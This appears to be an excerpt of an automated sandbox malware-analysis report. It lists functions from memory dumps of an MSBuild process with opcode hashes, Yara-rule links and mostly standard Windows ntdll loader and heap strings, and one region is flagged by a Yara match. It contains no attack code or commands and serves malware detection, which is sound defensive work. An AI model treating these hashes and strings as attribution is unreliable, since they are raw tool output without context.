                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                                                                                                                                  • API String ID: 0-761764676
                                                                                                                                                                                                                                                                  • Opcode ID: 262c27ee3d9f9d4182924fce8c25c741856a2085f0eeebf18e0373b1431144bd
                                                                                                                                                                                                                                                                  • Instruction ID: 215aa0a005c8e5f6fd50c82431391c0cb2a11bd8fbbe3f513ac1322926a10afa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 262c27ee3d9f9d4182924fce8c25c741856a2085f0eeebf18e0373b1431144bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5127C70900229CBDF24CF68C885BBDB7F8EF18718F14856AE949EB351E7359845CBA1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                                                  • API String ID: 0-1109411897
                                                                                                                                                                                                                                                                  • Opcode ID: 7d010a36aad9fd4b0e5d4ba4dd2f5d3b8f3f8653c68e28f4121f3973686d585c
                                                                                                                                                                                                                                                                  • Instruction ID: 855f8c271fffd555dbf3bcb24fff04dcc41f12b731eb05b52eebc3517be93269
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d010a36aad9fd4b0e5d4ba4dd2f5d3b8f3f8653c68e28f4121f3973686d585c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AA24B74A0572A8FDF64DF19CC887A9BBB9AF49308F1442E9D50DA7690DB309E85CF40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                                                                                                  • Opcode ID: 6bc8ef10c787dbdcafe46791143dd0860b1aee962d38332e6075431d2049b27a
                                                                                                                                                                                                                                                                  • Instruction ID: be04e26f6836923db6346ed8faab6922c116dead855dfc6f0999bb34bc0c261f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bc8ef10c787dbdcafe46791143dd0860b1aee962d38332e6075431d2049b27a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4420272208386DFD725DF28D880B2ABBE9FF88618F04496DF4A58B751D738D845CB52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                                                                                                                                                                  • API String ID: 0-4098886588
                                                                                                                                                                                                                                                                  • Opcode ID: 87358bc8f5541a9a9ccb604d7d7a8c7c9af2118265cc6723e5d159fac9a929f3
                                                                                                                                                                                                                                                                  • Instruction ID: 8157c3553bb67012e36f70c2c58e6a25cbeec4a38383863bf6488477afdb6407
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87358bc8f5541a9a9ccb604d7d7a8c7c9af2118265cc6723e5d159fac9a929f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A332937190436ECBDB22DB18C898BEEF7B9BF44348F1441E6D849A7295D7719E818F40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0139B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                                                                                                                                  • Opcode ID: 10b2f8002b2aeddb49e9a3f8dd3cfa1ec28fc95f498f28f34e575e61dce3796a
                                                                                                                                                                                                                                                                  • Instruction ID: ecca9d058185fff008687cad0888797152ddf8559c4a12ba0c72fba92c1605c4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10b2f8002b2aeddb49e9a3f8dd3cfa1ec28fc95f498f28f34e575e61dce3796a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C13531A0021AABEF25CF68D885FBEFBA9EF4170CF0440A9ED41AB6D5D7708944C391
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                                                                                                  • Opcode ID: 1fb0bdc151f1a3de4a20455963381d0409c0c76ffad3000fe442970b6c3bffa3
                                                                                                                                                                                                                                                                  • Instruction ID: 05debfb6021026cfbceab3008473ab4add06ea7cdc55cac36b77a90566289fd4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fb0bdc151f1a3de4a20455963381d0409c0c76ffad3000fe442970b6c3bffa3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C9148B0A017159BEB25DF18D885BEB7BA5BB50B1CF05413DE7007BA96E7789801C790
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0142F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                                                                  • API String ID: 0-1745908468
                                                                                                                                                                                                                                                                  • Opcode ID: 10d80779deef1bc5df175834d5c71c07ebc3185e9e40aab37adee88f7cbc96f0
                                                                                                                                                                                                                                                                  • Instruction ID: dd3b48773022caa43b3ea4e3e20514ac9cb8ae454012d3e67841edee3b389eac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10d80779deef1bc5df175834d5c71c07ebc3185e9e40aab37adee88f7cbc96f0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE91E031900661DFDB21DF68C440AAAFBF1FF59718F98805EE445AB371CB75A889CB10
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 013D99F4, 013D9A07, 013D9A30
                                                                                                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013D9A2A
                                                                                                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013D99ED
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 013D9A11, 013D9A3A
                                                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 01376496
                                                                                                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 013D9A01
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                                                                                                  • Opcode ID: 2b94456cab6f6fb6f995f1f745a47a8095b1a1b782d6963cf878a561f5f5f89e
                                                                                                                                                                                                                                                                  • Instruction ID: 675793374fb5587f1a05e936f16fb667fdccfe2bffc378698718476209e3950a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b94456cab6f6fb6f995f1f745a47a8095b1a1b782d6963cf878a561f5f5f89e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A05194722087059FF721DF28D851BAB77E8FB84A5CF01491DF5459B264DA30D904DB93
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00416C60 Relevance: 7.6, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $: $: $Host$Host: $Unknown
                                                                                                                                                                                                                                                                  • API String ID: 0-3527920956
                                                                                                                                                                                                                                                                  • Opcode ID: 88dda2b58b6e14c6def77d2b44e64e661ad5a90f8e59cea7bbca0c35659d7a29
                                                                                                                                                                                                                                                                  • Instruction ID: 0980c81dfac12ab25a7e410f7eeb280f68add20f6ac6552af1f382b08c8fe7f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88dda2b58b6e14c6def77d2b44e64e661ad5a90f8e59cea7bbca0c35659d7a29
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D21B272A04248AADB11CF95DC81BFFB778EF84304F04455EF9189B241D775A644C7E9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013F02E7
                                                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 013F031E
                                                                                                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013F02BD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                                                                                                  • Opcode ID: b322831ce23af6a29f1e2e8e5da1cdf18802ebb118b6b29e63f45a1d13dd7d3b
                                                                                                                                                                                                                                                                  • Instruction ID: 7130fc92e8e585fe21fd12d2ee5c2386d5471aa4d2b102c932c8611b10f50b3c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b322831ce23af6a29f1e2e8e5da1cdf18802ebb118b6b29e63f45a1d13dd7d3b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FE1C0306047419FD729CF2CC884B2ABBE9FB44328F544A2DF6A58B6E2D775D844CB52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01409C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                                                                                                                                                                  • API String ID: 0-3127649145
                                                                                                                                                                                                                                                                  • Opcode ID: 13f8af3ed58055e8ef253aa234fc60ccb10d7e6e916b77a2516caa2eb0e85278
                                                                                                                                                                                                                                                                  • Instruction ID: 40df841d83274175690a864069653b09dae1b9562679a18de9367758e6107064
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13f8af3ed58055e8ef253aa234fc60ccb10d7e6e916b77a2516caa2eb0e85278
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8324C75A0171A9BDB21DF69CC88B9AB7F8FF54704F1041EAD509A72A0DB70AE84CF40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01399950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                                                                                                                                  • API String ID: 0-3393094623
                                                                                                                                                                                                                                                                  • Opcode ID: 2cb0744c6d461a6117ead581d5195d40466e84557710f813093ba67c056ea394
                                                                                                                                                                                                                                                                  • Instruction ID: 308d274992b10fafd06f974646b06acb6f005fec072671aeb43ad3ac2423dd26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb0744c6d461a6117ead581d5195d40466e84557710f813093ba67c056ea394
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3028F71908396CFDB21CF68C48476BBBE4BF8875CF44891EE9899B250E774D844CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 013A527B
                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 013A542B
                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 013A5352
                                                                                                                                                                                                                                                                  • WindowsExcludedProcs, xrefs: 013A522A
                                                                                                                                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 013A5247
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                                                  • API String ID: 0-258546922
                                                                                                                                                                                                                                                                  • Opcode ID: 768360c0eb7064467e5adf33ace153f7c08f655bcb7b8c32ed317d015cee7643
                                                                                                                                                                                                                                                                  • Instruction ID: 1fe263fa58204bfcde5cd5311ba1fd8bce79748cf304de1c5d5266253b46fc88
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 768360c0eb7064467e5adf33ace153f7c08f655bcb7b8c32ed317d015cee7643
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83F15B72D00229EFDF16DFA8C984AEEBBF9FF58618F51005AE505E7250E7709E008B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01404F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                                                                                                                                  • API String ID: 0-2518169356
                                                                                                                                                                                                                                                                  • Opcode ID: c9aa29a85517821d6fdabb94f94eceade52129decac02f375077183d2183e9c3
                                                                                                                                                                                                                                                                  • Instruction ID: cac323c317dc33887d66a83f58b77e1d2c8897690efff183555c8228b46bc5a4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9aa29a85517821d6fdabb94f94eceade52129decac02f375077183d2183e9c3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B91B0B2D006199BCB22CF5DC880AEEB7B4EF48714F59416AE915EB3A0D775DA01CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                  • Opcode ID: 381f782d64accc374efaaa7dba146d3884555f1f8387e5bf8fc216def8e6d837
                                                                                                                                                                                                                                                                  • Instruction ID: ffbc73c8399fb2d0ce718688cddc1ce90a9a61c66aceb3ddee6286ffc29e02ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 381f782d64accc374efaaa7dba146d3884555f1f8387e5bf8fc216def8e6d837
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC139F70A0065ADFEF25CF68C4907A9BBF1FF99308F1481A9D949AB381D734A945CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01391070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3570731704
                                                                                                                                                                                                                                                                  • Opcode ID: b47357b14ccfc5f1b06d6717ba2c6eb2154cf5119d9ec0896821507ad0808b63
                                                                                                                                                                                                                                                                  • Instruction ID: 9413748f045aed4be22e6cfe04c082b8827f2fba73524acc0cdde55ed7c2015e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b47357b14ccfc5f1b06d6717ba2c6eb2154cf5119d9ec0896821507ad0808b63
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1924B75A0132ACFEF25CF18C844BA9B7B5BF45328F0581EAD949AB291D7349E80CF51
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0139A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 013E7D03
                                                                                                                                                                                                                                                                  • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 013E7D56
                                                                                                                                                                                                                                                                  • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 013E7D39
                                                                                                                                                                                                                                                                  • SsHd, xrefs: 0139A885
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                                                                                                                                  • API String ID: 0-2905229100
                                                                                                                                                                                                                                                                  • Opcode ID: 4055eb83d608c7a155d58bafb3b55f8b25d9ad01d0d78e7bd59079c53ba838bb
                                                                                                                                                                                                                                                                  • Instruction ID: 5c8ac3f6fc26be0640fba3da42f8c5f49d25b12eebfc0bfcde5043debdaddfe0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4055eb83d608c7a155d58bafb3b55f8b25d9ad01d0d78e7bd59079c53ba838bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3D1B175A0021ADFDF25CFA8C8C06AEBBF5FF48318F19416AE945AB351D3319991CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01393D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
